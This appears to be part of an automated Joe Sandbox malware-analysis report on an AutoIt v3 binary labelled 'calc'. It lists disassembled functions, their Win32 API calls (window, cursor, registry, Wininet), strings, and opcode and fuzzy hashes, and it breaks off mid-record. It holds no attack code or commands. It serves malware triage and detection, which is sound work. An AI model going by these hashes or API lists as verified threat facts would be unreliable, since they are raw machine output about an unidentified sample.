static, xrefs: 0042CA31, 0042CB3D
AutoIt v3, xrefs: 0042C9DA

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustClientDeleteFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 4116885437-517079104
Opcode ID: a5587cec23f01dc1b68f985e89440f218b0093f923a48c4f88b892f4fb94e88c
Instruction ID: 1615eac8dec7ae41765c77f636881bc5689f084a187106bb6c267292153e9747
Opcode Fuzzy Hash: a5587cec23f01dc1b68f985e89440f218b0093f923a48c4f88b892f4fb94e88c
Instruction Fuzzy Hash: CFB1AF71A00218FFDB249FA5DC89E9F7BB8EB45B15F04815AF600AA191D778DD40CF68

Function 0042CC1E Relevance: 36.1, APIs: 24, Instructions: 118threadCOMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 0042CC35
LoadCursorW.USER32(00000000,00007F00), ref: 0042CC40
LoadCursorW.USER32(00000000,00007F03), ref: 0042CC4B
LoadCursorW.USER32(00000000,00007F8B), ref: 0042CC56
LoadCursorW.USER32(00000000,00007F01), ref: 0042CC61
LoadCursorW.USER32(00000000,00007F81), ref: 0042CC6C
LoadCursorW.USER32(00000000,00007F88), ref: 0042CC77
LoadCursorW.USER32(00000000,00007F80), ref: 0042CC82
LoadCursorW.USER32(00000000,00007F86), ref: 0042CC8D
LoadCursorW.USER32(00000000,00007F83), ref: 0042CC98
LoadCursorW.USER32(00000000,00007F85), ref: 0042CCA3
LoadCursorW.USER32(00000000,00007F82), ref: 0042CCAE
LoadCursorW.USER32(00000000,00007F84), ref: 0042CCB9
LoadCursorW.USER32(00000000,00007F04), ref: 0042CCC4
LoadCursorW.USER32(00000000,00007F02), ref: 0042CCCF
GetCursorPos.USER32(?), ref: 0042CCD8
WindowFromPoint.USER32(?,?), ref: 0042CCE4
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0042CCF7
GetCurrentThreadId.KERNEL32 ref: 0042CD00
AttachThreadInput.USER32(00000000), ref: 0042CD03
GetCursor.USER32 ref: 0042CD09
GetWindowThreadProcessId.USER32(?,00000000), ref: 0042CD17
GetCurrentThreadId.KERNEL32 ref: 0042CD1A
AttachThreadInput.USER32(00000000), ref: 0042CD1D

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Cursor$Load$Thread$Window$AttachCurrentInputProcess$FromPoint
String ID:
API String ID: 25922675-0
Opcode ID: b3dee8c5c33cc5a5e27d9d6878bb93dc215f6f67bec1131d5dbaf3b8734b53b9
Instruction ID: b9d9b1f01e5e50cc857d8ed62ab4f6a13f19b37c746215968ab34a60c96efe33
Opcode Fuzzy Hash: b3dee8c5c33cc5a5e27d9d6878bb93dc215f6f67bec1131d5dbaf3b8734b53b9
Instruction Fuzzy Hash: 3831FE71D44319BADF119BB69C89CAFBEBCEF45B50B10042BB108E7191DAB89801CE65

Function 0040667C Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 279windowtimeCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00406756
GetClientRect.USER32(?,?), ref: 00406763
GetSystemMetrics.USER32(00000007), ref: 0040676B
GetSystemMetrics.USER32(00000008), ref: 00406775
GetSystemMetrics.USER32(00000004), ref: 0040677C
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004067B7
GetSystemMetrics.USER32(00000007), ref: 004067BF
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004067E4
GetSystemMetrics.USER32(00000008), ref: 004067EC
GetSystemMetrics.USER32(00000004), ref: 0040680B
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00406822
AdjustWindowRectEx.USER32(000000FF,000000FF,00000000,000000FF), ref: 00406833
CreateWindowExW.USER32(000000FF,AutoIt v3 GUI,?,000000FF,000000FF,000000FF,000000FF,000000FF,?,00000000,?,00000000), ref: 00406866
GetSysColorBrush.USER32(0000000F), ref: 00406889
SetClassLongW.USER32(00000000,000000F6,00000000), ref: 00406894
GetStockObject.GDI32(00000011), ref: 0040689D
SendMessageW.USER32(00000000,00000030,00000000), ref: 004068A8

Part of subcall function 00405E8E: GetCursorPos.USER32(?), ref: 00405E9B
Part of subcall function 00405E8E: ScreenToClient.USER32(?,?), ref: 00405EB8
Part of subcall function 00405E8E: GetAsyncKeyState.USER32(00000001), ref: 00405EFB
Part of subcall function 00405E8E: GetKeyState.USER32(00000001), ref: 00405F09
Part of subcall function 00405E8E: GetAsyncKeyState.USER32(00000002), ref: 00405F23
Part of subcall function 00405E8E: GetKeyState.USER32(00000002), ref: 00405F2C

SetTimer.USER32(00000000,00000002,00000028,0040D302), ref: 004069AE

Strings

@, xrefs: 00406800
AutoIt v3 GUI, xrefs: 0040685E

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: System$Metrics$RectState$Window$AsyncClientInfoParameters$AdjustBrushClassColorCreateCursorLongMessageObjectScreenSendStockTimer
String ID: @$AutoIt v3 GUI
API String ID: 1855594723-3359773793
Opcode ID: ed0fa0f3a7f5624e9a70382f54bd6e91281dbcd9423c2e20f3a68b4aaacbdfbb
Instruction ID: 514e7c4c687a5ce374bb04586ee4052b998ddc7ec21dd9060e496e987db54609
Opcode Fuzzy Hash: ed0fa0f3a7f5624e9a70382f54bd6e91281dbcd9423c2e20f3a68b4aaacbdfbb
Instruction Fuzzy Hash: 09C149B1900249DFDF11CF69C884ADA7FB4AF59314F05027AEE19AB296D7748890CF68

Function 0040A09F Relevance: 33.4, APIs: 22, Instructions: 439windowCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0040A134
SendMessageW.USER32(?,0000113F,00000000,?), ref: 0040A1D9
SendMessageW.USER32(?,00001102,00000002,?), ref: 0040A1EE

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend$Window
String ID:
API String ID: 2326795674-0
Opcode ID: 30ae90ada34b8915fe5d48397d56539aa5b534ff0d9fec3e80aeb03df8ee1511
Instruction ID: 1ccb3f83f87ebe80ca020bc58a8cdf7a85d923699afa6deb09b0e52051601b14
Opcode Fuzzy Hash: 30ae90ada34b8915fe5d48397d56539aa5b534ff0d9fec3e80aeb03df8ee1511
Instruction Fuzzy Hash: 4A028171504348ABEF21CF24CD85BE93BE0AF09354F28416AFD61AA2E2D378DC55DB49

Function 00441086 Relevance: 31.8, APIs: 16, Strings: 2, Instructions: 348windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 004411F0
GetDesktopWindow.USER32 ref: 00441202
GetWindowRect.USER32(00000000), ref: 00441209
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 004412E5
SendMessageW.USER32(00000000,00000432,00000000), ref: 00441302
SendMessageW.USER32(?,00000439,00000000), ref: 00441326
SendMessageW.USER32(?,00000421,?,?), ref: 00441339
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0044134C
IsWindowVisible.USER32(?), ref: 00441354
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0044136F
SendMessageW.USER32(?,00000411,00000001,00000000), ref: 00441382
GetWindowRect.USER32(?,?), ref: 00441398
CopyRect.USER32(?,?), ref: 0044140C
FreeLibrary.KERNEL32(?), ref: 0044144C
FreeLibrary.KERNEL32(?), ref: 00441457
SendMessageW.USER32(?,00000412,00000000,?), ref: 00441478

Strings

su, xrefs: 00441441
tooltips_class32, xrefs: 004412DE

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend$Window$Rect$FreeLibrary$CopyCreateCursorDesktopVisible
String ID: tooltips_class32$su
API String ID: 1377013427-183294876
Opcode ID: 43c6dc1a8b3db3df7b7c2940e1ab202c272af0dccaaacba1c09e653d6df8d75a
Instruction ID: 08c47ab1ab3467a4e06423d45bef535535d0a513bd421b0415e228815a64da0f
Opcode Fuzzy Hash: 43c6dc1a8b3db3df7b7c2940e1ab202c272af0dccaaacba1c09e653d6df8d75a
Instruction Fuzzy Hash: ACD17870600248EFEF14DF69C988A9A7BA4FF09350F14816AF919D7661D778ECC4CB98

Function 0040B005 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 205windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0040B0B5
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,00407B65,?,?,?), ref: 0040B0C7
LoadImageW.USER32(?,00000000,00000001,?,?,00000000), ref: 0040B0FD
LoadImageW.USER32(?,e{@,00000001,?,?,00000000), ref: 0040B11B
LoadImageW.USER32(00000000,e{@,00000001,?,?,00000000), ref: 0040B137
LoadImageW.USER32(?,00000000,00000001,?,?,00000000), ref: 0040B15E
FreeLibrary.KERNEL32(?), ref: 0040B16D
ExtractIconExW.SHELL32(?,e{@,00000000,?,00000001), ref: 0040B1B2
DestroyCursor.USER32(?), ref: 0040B1C0
SendMessageW.USER32(?,00000170,?,00000000), ref: 0040B1DF
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0040B1ED
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,00407B65,?,?,?), ref: 0040B208

Strings

.dll, xrefs: 0040B06E
e{@, xrefs: 0040B00F, 0040B215, 0040B178, 0040B152, 0040B0EB
.icl, xrefs: 0040B02F
e{@, xrefs: 0040B1AE, 0040B196, 0040B12F, 0040B111, 0040B117, 0040B135
su, xrefs: 0040B16D
.exe, xrefs: 0040B04D

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIconMoveWindow
String ID: .dll$.exe$.icl$e{@$e{@$su
API String ID: 1851087544-872391711
Opcode ID: f0c011a4a81bb99b9a90fc530ef8540607cced80a587fd92c96e883503bbf4b5
Instruction ID: d209de9e82884b2b1933e4d2be4e6672a96570fc34edf142eca6f664b014f0a1
Opcode Fuzzy Hash: f0c011a4a81bb99b9a90fc530ef8540607cced80a587fd92c96e883503bbf4b5
Instruction Fuzzy Hash: 2C618D72840219BEDB119FA4DC819BF7BBCEF08741F10806BF911E6181D7799E95CB98

Function 0043BC56 Relevance: 26.7, APIs: 10, Strings: 5, Instructions: 448registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,00000000,00000000), ref: 0043BD0B
RegCreateKeyExW.ADVAPI32(00000000,?,00000000,0045C6D0,00000000,?,00000000,?,?), ref: 0043BD4D
RegCloseKey.ADVAPI32(?), ref: 0043BD8C
RegCloseKey.ADVAPI32(0000000B), ref: 0043C0EA
RegCloseKey.ADVAPI32(?,00000000), ref: 0043C0FB

Strings

REG_EXPAND_SZ, xrefs: 0043BDA9
REG_DWORD, xrefs: 0043BF4A
REG_SZ, xrefs: 0043BE20
REG_BINARY, xrefs: 0043BFCA
REG_MULTI_SZ, xrefs: 0043BE9C

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Close$ConnectCreateRegistry
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_SZ
API String ID: 3641090821-2346799943
Opcode ID: 8cf315b22958215591c98de0ef14342ce1293641f5df6eb40e6edde85d215f73
Instruction ID: 4e5dcfff71b9e01845b74f9f44c6162979518723417988faa36490e585955599
Opcode Fuzzy Hash: 8cf315b22958215591c98de0ef14342ce1293641f5df6eb40e6edde85d215f73
Instruction Fuzzy Hash: 68F18035900114DBDF14EF55DC82A9AB374EF08324F29909BEA05AF252DB38ED81DBD9

Function 0042A8FA Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 286COMMON

Download Yara Rule

APIs

Part of subcall function 0042FD05: LoadLibraryA.KERNEL32(Wininet.dll,0042A928), ref: 0042FD10
Part of subcall function 0042FD05: GetProcAddress.KERNEL32(00000000,InternetReadFile), ref: 0042FD22

FreeLibrary.KERNEL32(00000000), ref: 0042ACB4

Part of subcall function 0042B114: FreeLibrary.KERNEL32(00000000,?,00000003), ref: 0042B198

GetLastError.KERNEL32(00000002,00000000,00000002,?,?,?,?), ref: 0042A9E1
GetLastError.KERNEL32 ref: 0042AA56
FreeLibrary.KERNEL32(?), ref: 0042AA7A
FreeLibrary.KERNEL32(?), ref: 0042AA90

Strings

su, xrefs: 0042AA6F, 0042AB1F, 0042AB61, 0042ABC9, 0042AC27, 0042ACB4

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Library$Free$ErrorLast$AddressLoadProc
String ID: su
API String ID: 575660042-45427494
Opcode ID: 62498265a6ceed1723bdac64fc116e2428d419dead5935b9ceaf4d3a7e747648
Instruction ID: f38a0db017b7cb7883463efc0abb6f25cc167194d0c8d956c07354d1d99e9000
Opcode Fuzzy Hash: 62498265a6ceed1723bdac64fc116e2428d419dead5935b9ceaf4d3a7e747648
Instruction Fuzzy Hash: 64C17171A00229EFDF15DFA1D944ADEBBB9FF08304F504067E805A2211D7389E95CF9A

Function 004530C8 Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 117fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 0045314B
_strcat.LIBCMT ref: 0045315E
_strlen.LIBCMT ref: 0045316B
_strlen.LIBCMT ref: 0045317A
_strncpy.LIBCMT ref: 00453191
_strlen.LIBCMT ref: 0045319A
_strlen.LIBCMT ref: 004531A7
_strcat.LIBCMT ref: 004531C5
_strlen.LIBCMT ref: 0045320A
GetStdHandle.KERNEL32(000000F4,0045BF80,00000000,?,00000000,00000000,00000000,00000000), ref: 00453215
WriteFile.KERNEL32(00000000), ref: 0045321C

Strings

..., xrefs: 0045318B
<program name unknown>, xrefs: 00453158
Microsoft Visual C++ Runtime Library, xrefs: 004531ED
Runtime Error!Program: , xrefs: 004531BF

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: _strlen$File_strcat$HandleModuleNameWrite_strncpy
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3601721357-4022980321
Opcode ID: cce6ef7323223f5c36d370e3365a6b8dfc54963e81cf1e794ab88ca9dee6c464
Instruction ID: a6262fdefab13baafbc7e32f5453cb19c54bbfc7fce803c14b00e12ad1906f00
Opcode Fuzzy Hash: cce6ef7323223f5c36d370e3365a6b8dfc54963e81cf1e794ab88ca9dee6c464
Instruction Fuzzy Hash: CC310E72500604AAE724EF759C96EAF7368EB04346F20491FF811D3143DA79E948DB5D

Function 004545BB Relevance: 26.3, APIs: 7, Strings: 8, Instructions: 99COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,0045C340,00000118,0044C951,00000001,00000000,0045B3B0,00000008,00453238), ref: 0045463F
_strcat.LIBCMT ref: 00454655
_strlen.LIBCMT ref: 00454665
_strlen.LIBCMT ref: 00454676
_strncpy.LIBCMT ref: 00454690
_strlen.LIBCMT ref: 00454699
_strcat.LIBCMT ref: 004546B5

Strings

Buffer overrun detected!, xrefs: 0045461B, 004546B3
..., xrefs: 0045468A
<program name unknown>, xrefs: 00454649
Program: , xrefs: 004546C6
Unknown security failure detected!, xrefs: 00454605
A security error of unknown cause has been detected which hascorrupted the program's internal state. The program cannot safelycontinue execution and must now be terminated., xrefs: 0045460A
Microsoft Visual C++ Runtime Library, xrefs: 004546F0
A buffer overrun has been detected which has corrupted the program'sinternal state. The program cannot safely continue execution and mustnow be terminated., xrefs: 00454620

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: _strlen$_strcat$FileModuleName_strncpy
String ID: ...$<program name unknown>$A buffer overrun has been detected which has corrupted the program'sinternal state. The program cannot safely continue execution and mustnow be terminated.$A security error of unknown cause has been detected which hascorrupted the program's internal state. The program cannot safelycontinue execution and must now be terminated.$Buffer overrun detected!$Microsoft Visual C++ Runtime Library$Program: $Unknown security failure detected!
API String ID: 3058806289-1010210193
Opcode ID: 7c6a0277e9c0f956f5106386100a7144fd3d0d8efe70c0ca049d5aaf753f3756
Instruction ID: 20cdc24c19fa16f92b1fdee65682d87b56783f751998074f5fad175280d1cb76
Opcode Fuzzy Hash: 7c6a0277e9c0f956f5106386100a7144fd3d0d8efe70c0ca049d5aaf753f3756
Instruction Fuzzy Hash: 9D31C4719006086FE710AB619C92F9F3768EB46319F10405BF800AA183DB7CEE59CB9D

Function 0044C499 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 71libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,75730A60,00000000,0044BF78,?,0045B1B8,00000060), ref: 0044C4B1
GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0044C4C9
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0044C4D6
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0044C4E3
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0044C4F0
FlsAlloc.KERNEL32(Function_0004C323,?,0045B1B8,00000060), ref: 0044C52D
FlsSetValue.KERNEL32(00000000,?,0045B1B8,00000060), ref: 0044C55A
GetCurrentThreadId.KERNEL32 ref: 0044C56E

Part of subcall function 0044C282: FlsFree.KERNEL32(00000005,0044C583,?,0045B1B8,00000060), ref: 0044C28D
Part of subcall function 0044C282: RtlDeleteCriticalSection.NTDLL(00000000), ref: 0044C5EC
Part of subcall function 0044C282: RtlDeleteCriticalSection.NTDLL(00000005), ref: 0044C616

Strings

FlsSetValue, xrefs: 0044C4D8
FlsAlloc, xrefs: 0044C4C3
kernel32.dll, xrefs: 0044C4AC
XF, xrefs: 0044C564
FlsFree, xrefs: 0044C4E5
FlsGetValue, xrefs: 0044C4CB
`su, xrefs: 0044C4B1

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$`su$kernel32.dll$XF
API String ID: 2635119114-1730721685
Opcode ID: 6aab792099a48fd3b5fd67e313977c4f19e88fcfdac56340a8163f1b3c9300aa
Instruction ID: 5ef84d50a295475a9834f727cfda9a2385d3a30a7da8ed7b00238fe560ffcff3
Opcode Fuzzy Hash: 6aab792099a48fd3b5fd67e313977c4f19e88fcfdac56340a8163f1b3c9300aa
Instruction Fuzzy Hash: B421B630906711EA97509F7AAC8851A7EA4E741769714067BF818D3261EBB8D804CB5D

Function 0040E543 Relevance: 25.7, APIs: 17, Instructions: 176windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(000000A1), ref: 0040E556
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0040E568
SetWindowTextW.USER32(?,?), ref: 0040E579
GetDlgItem.USER32(?,000003EA), ref: 0040E592
SetWindowTextW.USER32(00000000,?), ref: 0040E598
GetDlgItem.USER32(?,000003E9), ref: 0040E5AD
SetWindowTextW.USER32(00000000,?), ref: 0040E5B3
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0040E5D7
SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0040E5EC
GetWindowRect.USER32(?,?), ref: 0040E5F5
SetWindowTextW.USER32(?,?), ref: 0040E673
GetDesktopWindow.USER32 ref: 0040E67D
GetWindowRect.USER32(00000000), ref: 0040E684
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0040E6D0
GetClientRect.USER32(?,?), ref: 0040E6DD
PostMessageW.USER32(?,00000005,00000000,?), ref: 0040E702
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0040E733

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
